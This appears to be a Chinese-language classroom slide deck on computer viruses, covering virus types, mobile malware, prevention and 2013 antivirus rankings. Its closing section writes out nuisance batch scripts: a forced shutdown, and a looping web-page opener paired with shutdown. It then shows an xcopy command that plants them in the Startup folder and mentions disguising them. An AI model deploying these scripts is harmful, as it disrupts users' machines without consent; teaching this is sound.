資訊安全 - 病毒篇

大綱 電腦病毒簡介與預防 惡意程式實作

電腦病毒的定義•早期定義： 程式有自我複製、感染、破壞等。•後期定義： 未經使用者同意或造成不便的惡意程式。

電腦病毒的動機•表現自我能力•惡作劇•破壞資料、系統•偷窺、控制電腦•資料竊取、利益行為

電腦病毒的生命週期 •創造期 - 依駭客能力及動機原因，撰寫病毒。 •孕育期 - 病毒檔案透過網路 FTP、論壇、隨身裝置等， •潛伏期 - 病毒不斷繁殖傳染，長期的潛伏感染範圍大。 •發病期 - 遭到病毒感染的主機數目達到高峰，災情慘重。 •衰退期 - 防毒廠商定義病毒特徵碼，系統商推出安全性修補後，病毒逐漸退出網路。

電腦病毒的種類 ( 開機型病毒 )

•寄生在 MBR(主啟動磁區 ) ，電腦開機時，在 作業系統還沒載入前就被載入記憶體中，容 易造成系統無法開啟，刪除硬碟本身資料。 例米開朗基羅，會摧毀硬碟資料。

電腦病毒的種類 ( 檔案型病毒 )

•病毒本體依附在執行檔 (EXE、 COM..等 ) 上， 該執行檔被執行後即進行感染作業。例黑色 星期五，每逢 13日星期五發作時執行的程式 會遭刪除。

電腦病毒的種類 ( 混合型病毒 )

•具有開機型及檔案型病毒的特性，不僅感 染執行檔，也會感染啟動磁區 MBR。例 NATAS病毒，感染 EXE及 COM檔與C 槽的 PATITION，系統啟動時有 1/512機會要格式 化硬碟。

電腦病毒的種類 ( 巨集病毒 )

•具有寫巨集能力的軟體都有巨集病毒存在的 可能，如 Word、 Excel都相繼傳出災情。例 Taiwan No.1於每月 13日開啟感染文件時， 會跟您玩心算遊戲，若答錯會連續開啟許多 文件，並繼續出下一題心算，循環下去。

電腦病毒的種類 ( 巨集病毒 )

網路蠕蟲•自我複製能力，主動搜尋目標並自動攻擊的 系統漏洞攻擊碼，具有驚人的工作效率。例 疾風 (Blaster)迫使電腦主機每隔幾分鐘重 新開機。

電腦病毒與蠕蟲的影響•消耗系統資源 - 降低系統運作速度 - 影響正常應用程式的運作•破壞電腦檔案系統 - 停止系統更新 - 關閉防毒軟體或本機防火牆 - 刪除檔案或系統•消耗網路頻寬•成為網路攻擊的跳板

木馬 / 後門程式•木馬：偽裝成一般程式以獲得使用者信任，而 後在受害者端電腦執行帳號密碼竊取、資料破 壞…等任務。•後門：與外部攻擊者建立網路連線，接收傳 送命令，甚至可以讓入侵者直接操縱受害端 的資訊設備，例 Botnet殭屍病毒。

隨身碟病毒•主要利用微軟作業系統人性化的善意，在 外部資料放入時如隨身碟，系統會自動執 行，有心人士將此情形寫成 Autorun.inf 檔，在檔案中寫入執行的病毒。•磁碟區會有無法開啟現象，電腦運作速度 變慢

隨身碟病毒 - 解毒方式

•執行 kavo killer 5.4

無法連上網頁•無法上網卻可使用即時通及收發信件等行 為，主要中毒或在解毒過程中， winsock異 常原因。

無法連上網頁 - 解決方式

•執行 Winsockfix

電腦病毒防範觀念•安裝防毒軟體 ( 不同時安裝二套以上 ) 。•安裝防火牆或啟動內建防火牆。•關閉非必要之網路服務功能。•電腦系統軟體不定期更新。

電腦病毒防範觀念•不開啟來路不明郵件內的網址及執行檔。•不使用盜版軟體或來路不明的軟體。•避免使用公共電腦用過的儲存媒體。•瀏覽網頁時，不隨意同意加裝軟體。•養成良好的備份習慣。

AV-Comparative所評鑑出來的歷年冠軍

2013 G DATA 2013 ( 原 AntiViruskit-AVK) 2012 BitDefender （比特梵德） 2011 Kaspersky （卡巴斯基） 2010 F-Secure （芬安全） 2009 Symantec （賽門鐵克） 2008 AVIRA （小紅傘）

2013年 AV-Comparative防毒軟體排行

第一名 G DATA 2013 第六名 Fortinet,Vipre 第二名 AVIRA 第七名 AVG, Trend Micro 第三名 F-Secure 第八名 Sophos, McAfee 第四名 Bitdefender 第九名 Avast 第五名 Kaspersky 第十名 ESET

IOS 與 Android

Iphone首隻警告性病毒 2009 年由澳洲 21 歲的學生所撰寫，名為「艾克」，會將「越獄」的手機，螢幕背景換成 1980年代英國流行歌手Rick Astleyd 的照片。

Android 木馬病毒 2010年第一支手機木馬出現，趨勢科技發現這隻TROJ_DROIDSMS.A木馬會偽裝成 WMP的Play圖示，並在背景偷偷傳送簡訊到指定號碼！

Android 最新最難搞的木馬

程式： Android.Obad.a 感染方式： WIFI 或藍芽，感染時木馬 程式會鎖定螢幕約 10 秒。 後果：竊取手機資訊，擁有設備管理員權 限，遠端操控手機，具備「隱形功 能」防止被移除。 災情： 2013-06-10 前只有 0.15% 比例感染。

2013年 AV TEST 行動裝置安全排名

第一名 Bitdefender: Mobile Security 1.2 第二名 Kaspersky: Mobile Security 10.4 第三名 Trend Micro: Mobile Security 3.0 第四名 Avast: Mobile Security 2.0 第五名 Kingsoft: Mobile Security 2.2 第六名 ESET: Mobile Security 1.1 第七名 Comodo: Mobile Security 2.0

行動裝置防範觀念 •盡量在 play商店或 App Store中安裝APP •不下載盜版破解 APP或來路不明的 APP •不越獄 (JB)，不刷機 (ROOT) •安裝防毒軟體 •不定期更新系統及軟體

惡意程式實作流程

撰寫 合併偽裝 載入啟動

惡意程式撰寫 (1)•自動關機批次檔 (shutdown-start.bat)start shutdown -s -t 1000 #s關機， t 等待關機秒數

•自動關機解除批次檔 (shutdown-stop.bat)start shutdown -a

惡意程式撰寫 (2)•自動關機及網頁多重開啟批次檔 (start.bat):A # 標號start shutdown -s –t 1000 #s關機， t 等待關機秒數start www.hust.edu.tw #網頁開啟Goto A #執行標號迴圈

合併偽裝工具

惡意程式載入啟動中•自動載入批次檔至啟動中

xcopy “ 來源檔案” ”開始程式集內啟動路徑” /Y ( 相同檔名直接覆蓋 )

系統啟動設定

參考資料•趨勢科技•CTIMES 科技新聞•iThome 科技新聞•中山工商•商智謀略•F2KO 軟體官網